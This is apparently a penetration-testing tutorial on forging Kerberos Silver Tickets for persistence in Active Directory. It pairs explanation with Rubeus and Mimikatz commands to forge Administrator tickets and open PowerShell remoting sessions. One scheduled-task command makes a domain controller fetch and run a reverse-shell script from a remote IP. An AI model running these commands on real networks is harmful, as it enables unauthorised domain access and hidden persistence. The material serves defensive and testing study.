While most of the attention goes towards Golden Tickets as a means of persistence, Silver Tickets are also an effective method, and arguably quieter as well.
The difference is that while the scope is much larger if you use Golden Tickets, Silver Tickets limit your access to the service you wish to target.
Silver Tickets can be forged to gain access to a service in an AD if you are able to obtain the password hash of the service account running that service. That is because Ticket Granting Service (TGS) tickets are signed and encrypted with the hash of the account running the service. Therefore, having the hash of this account enables you to forge TGS tickets.
It should be noted that not only can you forge Silver Tickets from the hashes of service accounts, but can be done computer account hashes as well since these accounts run many services on the machine (like CIFS) as the local system. The computer hash does not have to be a Domain Controller hash. A computer that has access to the Domain Controller via group membership works as well.
Just like Golden Tickets, the forged ticket can be created on behalf of any user, including fake accounts.
If the Privileged Attribute Certificate (PAC) is not validated inside the TGS, it can be manipulated to elevate the account's privileges to that of an Admin.
A common method to obtain a service account hash is through kerberoasting.
I have explained already the Kerberos Authentication mechanism here.
There are 3 reasons why this persistence technique is so effective:
The hash of a service account is easier to obtain than that of the krbtgt.
It bypasses steps 1-4 of the Kerberos Authentication process altogether, meaning that forging a ticket requires no communication whatsoever with the Domain Controller. Log events will only be seen from the machines running the services you want to gain access to.
While computer account passwords are typically changed every 30 days, this can be disabled[1]. Regardless, 30 days to persist with this hash is still a reasonable amount of time.
With Rubeus.exe
# First request a TGT
.\Rubeus.exe asktgt /user:<user> /rc4:<hash>
# Then request a TGS
.\Rubeus.exe asktgs /ticket:<b64_ticket> /service:<service>/<domain>[,<service2>/<domain>] /ptt
# setup the scheduled task
schtasks /create /S <dc_domain> /SC Weekly /RU "NT Authority\SYSTEM" /TN "<name>" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://<ip>/Invoke-PowerShellTcp.ps1''')'"
# then run it and wait for your reverse shell
schtasks /Run /S <dc_domain> /TN "<name>"
# if you want to end or delete the task:
schtasks /End /S <dc_domain> /TN "<name>"
schtasks /delete /S <dc_domain> /TN "<name>"
Using Silver Tickets to Create a New Powershell Remoting Session
This attack requires two tickets, one for the http and the other for the wsman SPN
# Create a ticket for the HTTP Service
Invoke-Mimikatz -Command '"kerberos::golden /domain:<domain> /sid:<domain-SID> /target:<dc.domain> /service:HTTP /rc4:<computer-hash> /user:Administrator /ptt"'
# Now for the wsman SPN
Invoke-Mimikatz -Command '"kerberos::golden /domain:<domain> /sid:<domain-SID> /target:<dc.domain> /service:WSMAN /rc4:<computer-hash> /user:Administrator /ptt"'
# check if the tickets are created
klist
# Then enter a new session
$sess = New-PSSession -ComputerName <computer>
Enter-PSSession -Session $sess
Using Silver Tickets to Gain Access to LDAP Services
